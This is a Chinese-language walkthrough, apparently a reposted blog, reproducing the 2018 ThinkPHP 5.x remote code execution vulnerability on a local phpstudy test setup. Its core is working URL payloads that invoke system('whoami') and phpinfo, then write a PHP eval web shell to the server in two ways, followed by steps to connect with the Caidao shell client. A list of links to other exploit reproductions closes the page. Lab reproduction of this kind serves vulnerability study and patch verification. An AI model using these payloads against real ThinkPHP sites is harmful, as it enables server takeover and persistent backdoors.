ThinkPHP 5.x远程命令执行漏洞复现
ThinkPHP 5.x远程命令执行漏洞复现
一、漏洞描述
2018年12月10日,ThinkPHP官方发布了安全更新,其中修复了ThinkPHP5框架的一个高危漏洞: https://blog.thinkphp.cn/869075
漏洞的原因是由于框架对控制器名没有进行足够的检测,导致在没有开启强制路由(默认未开启)的情况下可能导致远程代码执行,受影响的版本包括5.0和5.1。
二、漏洞影响版本
Thinkphp 5.x-Thinkphp 5.1.31
Thinkphp 5.0.x<=5.0.23
三、漏洞复现
1、官网下载Thinkphp 5.0.22,下载地址: http://www.thinkphp.cn/donate/download/id/1260.html
2、使用phpstudy搭建环境,解压下载的Thinkphp5.0.22到网站目录下,浏览器访问http://192.168.10.171/thinkphp5.0.22/public
3、利用system函数远程命令执行
Payload如下:
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
4、通过phpinfo函数查看phpinfo()的信息
Payload如下:
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
5、写入shell
Payload如下:
?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php @eval($_POST[cmd]);?^> >shell.php
注意:需要对特殊字符使用^转义(cmd环境下转义方式),windows环境的echo命令输出字符串到文档不用引号(单引号、双引号),部分字符url编码不编码都行。
6、查看是否成功写入shell
7、菜刀连接
8、第二种的写入shell的方法
Payload如下:
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../test.php&vars[1][]=<?php @eval($_POST[test]);?>
9、查看是否成功写入文件
10、菜刀连接
转载于:https://www.cnblogs.com/yuzly/p/11460285.html
- ThinkPHP 5.x远程命令执行漏洞复现
- ThinkPHP 5.x 远程命令执行漏洞修复
- 【漏洞复现】ThinkPHP5 5.x 远程命令执行(getshell)
- CVE-2017-8464 远程命令执行漏洞复现
- 复现IIS6.0远程命令执行漏洞
- tomcat 远程命令执行漏洞复现
- 利用Vulnhub复现漏洞 - Jenkins远程命令执行漏洞(CVE-2018-1000861)
- 利用Vulnhub复现漏洞 - Gitlist 0.6.0 远程命令执行漏洞
- 方程式漏洞之复现window2008/win7 远程命令执行漏洞
- 利用Vulnhub复现漏洞 - Nexus Repository Manager 3 远程命令执行漏洞(CVE-2019-7238)
- Apache struts2 Freemarker标签远程命令执行_CVE-2017-12611(S2-053)漏洞复现
- 网站安全加固之apache环境S2-057漏洞 利用POC 远程执行命令漏洞复现
- CVE-2017-8464远程命令执行漏洞(震网漏洞)复现
- 利用Vulnhub复现漏洞 - Electron WebPreferences 远程命令执行漏洞(CVE-2018-15685)
- shellshock破壳远程命令执行漏洞复现通过web的方式进行web执行远程代码
- CVE-2017-8464远程命令执行漏洞(震网漏洞)复现
- CVE-2017-8464远程命令执行漏洞复现
- ThinkPHP 5.0.x、5.1.x、5.2.x 全版本远程命令执行漏洞
- Apache struts2远程命令执行_CVE-2017-9805(S2-052)漏洞复现
- Apache struts2 namespace远程命令执行_CVE-2018-11776(S2-057)漏洞复现